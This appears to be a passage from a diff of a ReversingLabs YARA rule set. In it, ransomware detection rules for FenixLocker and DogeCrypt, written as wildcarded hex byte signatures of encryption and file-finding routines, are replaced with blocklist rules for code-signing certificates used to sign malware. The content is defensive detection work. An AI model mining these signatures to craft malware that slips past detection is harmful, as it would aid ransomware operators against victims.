?? ?? ?? ?? 8D 95 ?? ?? ?? ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? - ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8 - } - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B - 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? - 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F - 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? - ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? - 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? - ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? - 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? - 8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 - } - $find_files_p2 = { - EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 - 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? - ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD - 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 - ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? - ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 - ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? - 83 C4 ?? E9 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Y.L. Knafo, Ltd." and pe.signatures[i].serial=="19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE { meta: - description = "Yara rule that detects FenixLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4868ced4-885d-548c-993c-ae25ab188172" - date = "2020-07-15" - modified = "2020-07-15" + id = "14a292da-36c1-5a37-b27e-20c982e44c25" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14822-L14838" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "FenixLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4 - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8 - 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF - B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B - E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ?? - ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_2 = { - B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 - ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? - F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? - 8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 - ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ?? - ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85 - C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 - 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B - C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 - C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 - ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? - ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F - 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? - ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? - 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? - ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? - 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F - 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ?? - ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? - ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_3 = { - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 - ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? - 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F - 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F - 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? - 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? - 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? - 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D - 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - 46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ?? - ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B - C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 - } - $encrypt_files_4 = { - 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 - ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 - ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ?? - F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D - 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 - 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? - E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 - } - $encrypt_files_5 = { - FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? - ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? - ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B - E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? - ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF - B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 - 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? - ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? - 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? - ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and ($encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3) or ($encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Apex Tech, SIA" and pe.signatures[i].serial=="7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE { meta: - description = "Yara rule that detects DogeCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2" - date = "2021-04-28" - modified = "2021-04-28" + id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14840-L14856" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DogeCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_DogeCrypt_p1 = { - 50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ?? - ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43 - B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 - C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? - ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A - ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B - F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B - 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? - 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? - ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? - ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? - ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? - ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? - ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? - ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 - } - $encrypt_files_DogeCrypt_p2 = { - C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 - FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? - ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF - 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74 - ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? - 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 